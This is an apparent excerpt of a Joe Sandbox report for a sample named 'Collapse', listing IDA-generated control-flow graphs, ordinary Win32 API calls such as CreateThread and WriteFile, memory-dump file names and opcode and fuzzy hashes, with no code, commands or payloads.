                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3664257935-537541572
                                                                                                        • Opcode ID: caea27f6a9aebc3339d813ff974f22182cdcb416de1ac38aecd0fb485d08f3a6
                                                                                                        • Instruction ID: e7b3348feb83d847b4abc2b2069e35d7a79e304c6e8222e503201e61715736ee
                                                                                                        • Opcode Fuzzy Hash: caea27f6a9aebc3339d813ff974f22182cdcb416de1ac38aecd0fb485d08f3a6
                                                                                                        • Instruction Fuzzy Hash: 362105B1A09224A7CF219B6DFE41B9B375C9F417B0F250220E916A72D1DB38ED00D6D0

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 1378416451-0
                                                                                                        • Opcode ID: 35548ab9d866f13f9c192b5c82170e745a9ffd163fa8aed71711de723c2f0134
                                                                                                        • Instruction ID: 1133a2cb3c91c0bda31fd3a38476e2650099663281f611f60b24729ec5f1ed97
                                                                                                        • Opcode Fuzzy Hash: 35548ab9d866f13f9c192b5c82170e745a9ffd163fa8aed71711de723c2f0134
                                                                                                        • Instruction Fuzzy Hash: CA71B1B0D08258CFCB04EFA8D58979DBBF4BF48314F10892AE499AB351D735A945CF52

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 80 98a4d0-98a536 81 98a53c-98a54d 80->81 82 98a571-98a594 call 984420 80->82 83 98a553-98a55f 81->83 84 98a565-98a56b 81->84 87 98a59a-98a5a6 82->87 88 98a5ab-98a5c3 82->88 83->84 84->82 89 98a621-98a762 call 998c30 call 99876d call 998c30 call 9843a0 call 984290 call 9843d0 call 9887f0 call 988890 call 988850 call 9843a0 call 9888b0 call 9843d0 call 9889c0 call 988a10 87->89 90 98a5c9-98a5d9 88->90 91 98a61c 88->91 123 98a798-98a79f 89->123 124 98a768-98a795 call 98b0e0 call 988890 89->124 90->91 92 98a5df-98a5f0 90->92 91->89 94 98a60d-98a616 92->94 95 98a5f6-98a607 92->95 94->91 95->91 95->94 126 98a7a5-98a7ae 123->126 127 98a8c7-98a8e0 call 981d10 call 9841a0 123->127 124->123 129 98a7b4-98a7c0 126->129 130 98a7c5-98a7cb 126->130 141 98a8fc-98a906 127->141 142 98a8e6-98a8f6 call 9841a0 127->142 133 98a7d1-98a7f1 call 9889f0 129->133 130->133 140 98a7f7-98a80b 133->140 143 98a84c-98a854 140->143 144 98a811-98a826 140->144 146 98a91c-98a936 call 984420 141->146 142->141 156 98a90b-98a916 call 9841a0 142->156 149 98a85a-98a8c2 143->149 150 98a85f-98a8a8 call 988a30 143->150 144->143 147 98a82c-98a846 144->147 158 98aa28-98aa32 146->158 159 98a93c-98a946 146->159 147->143 149->127 163 98a8bd 150->163 164 98a8ae-98a8b7 150->164 156->146 160 98aa38-98ab21 call 988890 call 988bc0 call 988b40 158->160 161 98ab26-98abac call 988890 call 988bc0 158->161 159->158 165 98a94c-98aa23 call 988b40 call 988890 call 988bc0 159->165 181 98abaf 160->181 161->181 163->140 164->163 182 98abb4-98ac2a call 988890 call 988bc0 165->182 181->182 188 98ac2f-98acd5 call 984570 call 988b40 call 981dc0 call 988c50 call 98ba3f 182->188
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3709121408-2766056989
                                                                                                        • Opcode ID: bc53060a86966f65b89bc7f01dc9249506ac4eaec1d3ad19383e36fb066d32b4
                                                                                                        • Instruction ID: ab9a41d79421fe0c98ffbbac8c8084e8548730c990f4f1381dd1dc93f8d8addb
                                                                                                        • Opcode Fuzzy Hash: bc53060a86966f65b89bc7f01dc9249506ac4eaec1d3ad19383e36fb066d32b4
                                                                                                        • Instruction Fuzzy Hash: 4D32C3B49042698FDB14EF64C981B9EFBF1BF88300F0585AAE849A7351D734AA85CF51

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleFreeProtectVirtual
                                                                                                        • String ID: @
                                                                                                        • API String ID: 621788221-2766056989
                                                                                                        • Opcode ID: 74641e57a551c72789d9ee2527f8e9d8724c889958448119e5270fdefdf92db9
                                                                                                        • Instruction ID: 57827cde82452fb2e116198feafdfac2bd5e4c93d51de9d1806e14aaabb0753d
                                                                                                        • Opcode Fuzzy Hash: 74641e57a551c72789d9ee2527f8e9d8724c889958448119e5270fdefdf92db9
                                                                                                        • Instruction Fuzzy Hash: EB41DDB0D04208DFCB04EFA9E98469EBBF4EF88314F10851AE858AB350D779A945CF91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 215 99481d-994828 216 99482a-99483d call 996bb1 call 99729c 215->216 217 99483e-994851 call 9948ae 215->217 222 99487f 217->222 223 994853-994870 CreateThread 217->223 228 994881-99488d call 9948fe 222->228 226 99488e-994893 223->226 227 994872-99487e GetLastError call 996bd7 223->227 231 99489a-99489e 226->231 232 994895-994898 226->232 227->222 231->228 232->231
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(?,?,Function_00014935,00000000,?,?), ref: 00994866
                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,0098B58D), ref: 00994872
                                                                                                        • __dosmaperr.LIBCMT ref: 00994879
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2744730728-0
                                                                                                        • Opcode ID: ab2271833930eecd8adbadfd7a490d2e6bb6d5643f0d50c6e0a3a01a2df9afbc
                                                                                                        • Instruction ID: f9a83d96357eb8e342ca87ab810d84eeb1c69b5bfb2447fbc8ec54ce7fe9ee25
                                                                                                        • Opcode Fuzzy Hash: ab2271833930eecd8adbadfd7a490d2e6bb6d5643f0d50c6e0a3a01a2df9afbc
                                                                                                        • Instruction Fuzzy Hash: 8001B172914259BFDF169FBADC06EAE7B68EF80360F004158F80196550EB70CD11EBA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 235 9949b3-9949c0 call 99b104 238 994a00-994a03 ExitThread 235->238 239 9949c2-9949ca 235->239 239->238 240 9949cc-9949d0 239->240 241 9949d2 call 99bc52 240->241 242 9949d7-9949dd 240->242 241->242 243 9949ea-9949f0 242->243 244 9949df-9949e1 242->244 243->238 247 9949f2-9949f4 243->247 244->243 246 9949e3-9949e4 CloseHandle 244->246 246->243 247->238 248 9949f6-9949fa FreeLibraryAndExitThread 247->248 248->238
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099B104: GetLastError.KERNEL32(00000000,?,00996BB6,0099C132,?,?,0099B000,00000001,00000364,?,00000005,000000FF,?,0099495A,009B56B0,0000000C), ref: 0099B108
                                                                                                          • Part of subcall function 0099B104: SetLastError.KERNEL32(00000000), ref: 0099B1AA
                                                                                                        • CloseHandle.KERNEL32(?,?,?,009948AD,?,?,00994993,00000000), ref: 009949E4
                                                                                                        • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,009948AD,?,?,00994993,00000000), ref: 009949FA
                                                                                                        • ExitThread.KERNEL32 ref: 00994A03
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 1991824761-0
                                                                                                        • Opcode ID: efd2a49776041c93c2a70a7a4caac2c4cfffd59ef3d91418099f1a63904feb21
                                                                                                        • Instruction ID: 6d0689a6bc78e2f6866962edf518955615c0879eceb669e710744c9023d7de82
                                                                                                        • Opcode Fuzzy Hash: efd2a49776041c93c2a70a7a4caac2c4cfffd59ef3d91418099f1a63904feb21
                                                                                                        • Instruction Fuzzy Hash: BBF082300496406BCF225B7DED09F5B7B9C6F01764B194724F83AD65B1DB34DC42D658

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000002,?,00994BE6,00997849,00997849,?,00000002,F1D6E486,00997849,00000002), ref: 00994B35
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00994BE6,00997849,00997849,?,00000002,F1D6E486,00997849,00000002), ref: 00994B3C
                                                                                                        • ExitProcess.KERNEL32 ref: 00994B4E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: 306b71f3438904939001b133e0543a45333efe26735fffe5edac1e4262782747
                                                                                                        • Instruction ID: 82b9db48595762b8cc97e32d22156f2c0f5f476f13f37095c25daf30efb8b981
                                                                                                        • Opcode Fuzzy Hash: 306b71f3438904939001b133e0543a45333efe26735fffe5edac1e4262782747
                                                                                                        • Instruction Fuzzy Hash: 74D06731058104ABCF122FA5ED09E5D3F29AB443517444510BA0556162DB31D952FA94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 256 9a2d15-9a2d37 257 9a2f2a 256->257 258 9a2d3d-9a2d3f 256->258 261 9a2f2c-9a2f30 257->261 259 9a2d6b-9a2d8e 258->259 260 9a2d41-9a2d60 call 997445 258->260 263 9a2d90-9a2d92 259->263 264 9a2d94-9a2d9a 259->264 267 9a2d63-9a2d66 260->267 263->264 266 9a2d9c-9a2dad 263->266 264->260 264->266 268 9a2daf-9a2dbd call 9a1760 266->268 269 9a2dc0-9a2dd0 call 9a3042 266->269 267->261 268->269 274 9a2e19-9a2e2b 269->274 275 9a2dd2-9a2dd8 269->275 278 9a2e2d-9a2e33 274->278 279 9a2e82-9a2ea2 WriteFile 274->279 276 9a2dda-9a2ddd 275->276 277 9a2e01-9a2e17 call 9a30bf 275->277 282 9a2de8-9a2df7 call 9a3486 276->282 283 9a2ddf-9a2de2 276->283 299 9a2dfa-9a2dfc 277->299 280 9a2e6e-9a2e7b call 9a34ee 278->280 281 9a2e35-9a2e38 278->281 285 9a2ead 279->285 286 9a2ea4-9a2eaa GetLastError 279->286 298 9a2e80 280->298 287 9a2e5a-9a2e6c call 9a36b2 281->287 288 9a2e3a-9a2e3d 281->288 282->299 283->282 289 9a2ec2-9a2ec5 283->289 293 9a2eb0-9a2ebb 285->293 286->285 306 9a2e55-9a2e58 287->306 294 9a2ec8-9a2eca 288->294 295 9a2e43-9a2e50 call 9a35c9 288->295 289->294 300 9a2ebd-9a2ec0 293->300 301 9a2f25-9a2f28 293->301 302 9a2ef8-9a2f04 294->302 303 9a2ecc-9a2ed1 294->303 295->306 298->306 299->293 300->289 301->261 309 9a2f0e-9a2f20 302->309 310 9a2f06-9a2f0c 302->310 307 9a2eea-9a2ef3 call 996c3d 303->307 308 9a2ed3-9a2ee5 303->308 306->299 307->267 308->267 309->267 310->257 310->309
                                                                                                        APIs
                                                                                                          • Part of subcall function 009A30BF: GetConsoleOutputCP.KERNEL32(F1D6E486,00000000,00000000,?), ref: 009A3122
                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,009924F1,?,00992753), ref: 009A2E9A
                                                                                                        • GetLastError.KERNEL32(?,009924F1,?,00992753,?,00992753,?,?,?,?,?,?,?,?,?,?), ref: 009A2EA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 2915228174-0
                                                                                                        • Opcode ID: 815a1b41979dff8b9e37e4a4384fac9eb062be098ba0243c573f02bf5a33090b
                                                                                                        • Instruction ID: 968e55d994dfedf15ee2caed185a97d24bf2dc003dddd6ba1ca186d6843280e8
                                                                                                        • Opcode Fuzzy Hash: 815a1b41979dff8b9e37e4a4384fac9eb062be098ba0243c573f02bf5a33090b
                                                                                                        • Instruction Fuzzy Hash: F461B171D04119AFDF15CFACC984AEEBBB9AF5A304F240149F800AB252D736DA41DBE0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 313 9a34ee-9a3543 call 98ece0 316 9a35b8-9a35c8 call 98ba3f 313->316 317 9a3545 313->317 319 9a354b 317->319 321 9a3551-9a3553 319->321 322 9a356d-9a3592 WriteFile 321->322 323 9a3555-9a355a 321->323 326 9a35b0-9a35b6 GetLastError 322->326 327 9a3594-9a359f 322->327 324 9a355c-9a3562 323->324 325 9a3563-9a356b 323->325 324->325 325->321 325->322 326->316 327->316 328 9a35a1-9a35ac 327->328 328->319 329 9a35ae 328->329 329->316
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,009A2E80,?,00992753,?,?,?,00000000), ref: 009A358A
                                                                                                        • GetLastError.KERNEL32(?,009A2E80,?,00992753,?,?,?,00000000,?,?,?,?,?,009924F1,?,00992753), ref: 009A35B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 442123175-0
                                                                                                        • Opcode ID: cda2f7245930752088d50ba3d206e4b3683af4b6e1328d64151e9aff19fe118b
                                                                                                        • Instruction ID: ad284078ba055fc8b692817d3430a4aad40914db548ac9c93a529693af5a16a3
                                                                                                        • Opcode Fuzzy Hash: cda2f7245930752088d50ba3d206e4b3683af4b6e1328d64151e9aff19fe118b
                                                                                                        • Instruction Fuzzy Hash: 0A215E31A002199BCF19CF1DDD809D9B7B9AB89315B1481A9F94AD7211E730EE46CFA4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 330 99c862-99c867 331 99c869-99c881 330->331 332 99c88f-99c898 331->332 333 99c883-99c887 331->333 335 99c8aa 332->335 336 99c89a-99c89d 332->336 333->332 334 99c889-99c88d 333->334 340 99c904-99c908 334->340 339 99c8ac-99c8b9 GetStdHandle 335->339 337 99c89f-99c8a4 336->337 338 99c8a6-99c8a8 336->338 337->339 338->339 341 99c8bb-99c8bd 339->341 342 99c8e6-99c8f8 339->342 340->331 343 99c90e-99c911 340->343 341->342 344 99c8bf-99c8c8 GetFileType 341->344 342->340 345 99c8fa-99c8fd 342->345 344->342 346 99c8ca-99c8d3 344->346 345->340 347 99c8db-99c8de 346->347 348 99c8d5-99c8d9 346->348 347->340 349 99c8e0-99c8e4 347->349 348->340 349->340
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0099C751,009B5BA0), ref: 0099C8AE
                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0099C751,009B5BA0), ref: 0099C8C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3000768030-0
                                                                                                        • Opcode ID: 0fc5e499e6b1e946457445d740b6071a7c8f44842b741d342221bc7f2b788a2c
                                                                                                        • Instruction ID: 2c3c7f7e513570ecb78ac4798c87ade36c619a888e4ca31391215de9a4a9e89a
                                                                                                        • Opcode Fuzzy Hash: 0fc5e499e6b1e946457445d740b6071a7c8f44842b741d342221bc7f2b788a2c
                                                                                                        • Instruction Fuzzy Hash: 7F1190F16087514ACF348E3F8C88632BA9DAB56330B380B5ED0B6D75F1C674D886E655

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(009B56B0,0000000C), ref: 00994948
                                                                                                        • ExitThread.KERNEL32 ref: 0099494F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitLastThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1611280651-0
                                                                                                        • Opcode ID: fc7994360a3d13c7f580591346bc8bf084d593a0ec69af28e12dfc321ad947cf
                                                                                                        • Instruction ID: 30b7f99387bfc0ac6be059bf69e504621ce4f6ffdff174034ed8650d2d2467f8
                                                                                                        • Opcode Fuzzy Hash: fc7994360a3d13c7f580591346bc8bf084d593a0ec69af28e12dfc321ad947cf
                                                                                                        • Instruction Fuzzy Hash: 64F0AF70964201AFDF01AFB4D94AB6E7B74EF81720F110249F40697652DB745941EFA1

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00981B98
                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 00981BB8
                                                                                                          • Part of subcall function 00981860: CreateFileA.KERNELBASE ref: 009818E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileModule$CreateHandleName
                                                                                                        • String ID:
                                                                                                        • API String ID: 2828212432-0
                                                                                                        • Opcode ID: f5449bcdf2ae73918875144be25e48553de83bcf7bc92ae06f1036532366f88a
                                                                                                        • Instruction ID: 3be43a3ca6fcdf9128cbf7f9182427e243409f934ccceb24a87178e868921d85
                                                                                                        • Opcode Fuzzy Hash: f5449bcdf2ae73918875144be25e48553de83bcf7bc92ae06f1036532366f88a
                                                                                                        • Instruction Fuzzy Hash: ACF01DB191820C8FCB54FF78E94939DBBF4AB48300F4145ADD4C9D7340EA7459889F82

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 375 99ad27-99ad30 376 99ad5f-99ad60 375->376 377 99ad32-99ad45 RtlFreeHeap 375->377 377->376 378 99ad47-99ad5e GetLastError call 996bfa call 996bb1 377->378 378->376
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,0099F0A4,?,00000000,?,?,0099ED44,?,00000007,?,?,0099F68A,?,?), ref: 0099AD3D
                                                                                                        • GetLastError.KERNEL32(?,?,0099F0A4,?,00000000,?,?,0099ED44,?,00000007,?,?,0099F68A,?,?), ref: 0099AD48
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
